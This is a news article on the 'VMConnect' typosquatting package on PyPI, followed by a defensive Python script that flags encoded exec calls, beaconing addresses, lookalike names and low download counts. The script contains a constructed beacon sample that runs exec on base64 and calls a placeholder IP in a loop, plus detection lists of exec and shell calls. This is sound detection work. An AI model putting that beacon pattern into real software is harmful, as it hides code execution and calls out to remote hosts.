IT professionals were targeted by a malicious package named “VMConnect,” which impersonated the VMware vSphere connector module “vConnector” and was uploaded to the Python Package Index (PyPI).
Fake VMware vConnector package
According to research by Sonatype and reporting by BleepingComputer correspondent Ax Sharma, VMware vSphere is a virtualization toolset, and vConnector is a Python module for it used by developers and system administrators. vConnector typically receives around 40,000 downloads per month on PyPI.
On July 28, 2023, a malicious package was uploaded to PyPI, impersonating vConnector. By the time it was detected and removed on August 1, 2023, the malicious package had been downloaded 237 times.
The researchers have named this campaign “PaperPin.”
During their analysis, Sonatype’s researchers faced a challenge as the second-stage payload from the attacker-controlled URL had already been removed, which hindered further investigation.
Nevertheless, the package’s intent was unmistakable—it was designed to function as a beacon, connecting to a Command & Control server, and subsequently downloading and executing malicious payloads.
“Although the second-stage payload was not available for analysis during the research, the malicious intent behind this package is evidently clear,” said Lamba.
“The decoded base64 string seems to act as a beacon that communicates with a Command & Control server. Once installed on an unsuspecting user’s machine, the package would repeatedly beacon out to an external IP address, downloading and executing malicious payloads at regular intervals.”
Sonatype promptly reported the malicious PyPI packages to the registry administrators and the packages were taken down. The researchers also attempted to contact the user “hushki502,” the username associated with the counterfeit package on both GitHub and PyPI, but received no response.
The only indicators available to developers were the package’s low download count, concealed (encoded) code within certain files, and a package name that resembled a legitimate project without matching it exactly.
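The behaviour the researchers describe (a base64 string that is decoded and executed, periodic contact with an external address) and the three indicators listed above can be turned into a pre-install triage check. The script below is an added example written for this article; it is not Sonatype’s tooling or code from the VMConnect package. The sample module it scans is constructed to reproduce only the shape described (a base64 literal passed to exec, an HTTP client import, a hard-coded address) and its decoded blob is a harmless print call; the KNOWN_PACKAGES list, the 0.8 name-similarity threshold and the 5% download ratio are assumptions a defender would tune locally.

```python
"""Heuristic triage for the indicators named in the article: encoded code that is
decoded and executed, beaconing to an external address, a name close to but not
equal to a popular project, and an implausibly low download count."""
import ast
import base64
import binascii
import difflib
import re

# Constructed sample module (not the real VMConnect code): same shape as the
# behaviour described, but the base64 blob decodes to print('hello').
SAMPLE_SOURCE = '''
import base64, time, urllib.request
_blob = "cHJpbnQoJ2hlbGxvJyk="
while True:
    exec(base64.b64decode(_blob))
    urllib.request.urlopen("http://203.0.113.10/update")
    time.sleep(60)
'''

KNOWN_PACKAGES = ["vconnector", "requests"]  # assumed local allow-list
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
IP_OR_URL_RE = re.compile(r"https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}\b")
NETWORK_MODULES = {"socket", "requests", "urllib", "http", "httpx"}
EXEC_NAMES = {"exec", "eval", "__import__"}
SHELL_CALLS = {("os", "system"), ("os", "popen"), ("subprocess", "run"),
               ("subprocess", "Popen"), ("subprocess", "call")}


def _call_name(node):
    """'exec' for exec(...), ('os', 'system') for os.system(...), else None."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None


def decode_base64_literals(source):
    """String constants that look like base64 and decode to printable text."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if not B64_RE.match(node.value):
                continue
            try:
                text = base64.b64decode(node.value, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not really base64, or binary: skip
            if text.isprintable():
                found.append((node.value, text))
    return found


def suspicious_calls(source):
    """exec/eval/__import__ and shell-spawning calls, plus network imports."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_NAMES or name in SHELL_CALLS:
                hits.append("call:" + (name if isinstance(name, str) else ".".join(name)))
        elif isinstance(node, ast.Import):
            hits += [f"network-import:{a.name}" for a in node.names
                     if a.name.split(".")[0] in NETWORK_MODULES]
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                hits.append(f"network-import:{node.module}")
    return hits


def external_addresses(source, decoded_blobs=()):
    """URLs or IPv4 literals in the source and in any decoded base64 blobs."""
    text = source + "\n" + "\n".join(decoded_blobs)
    return sorted(set(IP_OR_URL_RE.findall(text)))


def typosquat_candidates(name, known=KNOWN_PACKAGES, threshold=0.8):
    """Known names that are close to `name` (after normalisation) but not equal."""
    def norm(s):
        return re.sub(r"[-_.]", "", s.lower())
    n, out = norm(name), []
    for k in known:
        kn = norm(k)
        if kn == n:
            continue
        ratio = difflib.SequenceMatcher(None, n, kn).ratio()
        if ratio >= threshold or kn in n or n in kn:
            out.append((k, round(ratio, 2)))
    return out


def assess_package(name, source, downloads, baseline_monthly, known=KNOWN_PACKAGES):
    """Combine the indicators into one verdict; score counts how many fired."""
    blobs = [t for _, t in decode_base64_literals(source)]
    indicators = {
        "base64_blobs": blobs,
        "calls": suspicious_calls(source),
        "addresses": external_addresses(source, blobs),
        "name_lookalikes": typosquat_candidates(name, known),
        "low_downloads": downloads < 0.05 * baseline_monthly,  # 237 vs ~40,000/month
    }
    return {"package": name, "score": sum(bool(v) for v in indicators.values()),
            "indicators": indicators}


if __name__ == "__main__":
    import json
    print(json.dumps(assess_package("VMConnect", SAMPLE_SOURCE, 237, 40_000), indent=2))
```

Run against the constructed sample, all five indicators fire and the decoded blob is shown in clear text, which is the point: the reviewer sees what the string would have executed instead of an opaque literal. Static heuristics like these only surface candidates for a human or sandbox to look at; a package that fetches its second stage at runtime, as this one did, still needs the network behaviour observed to be fully characterised.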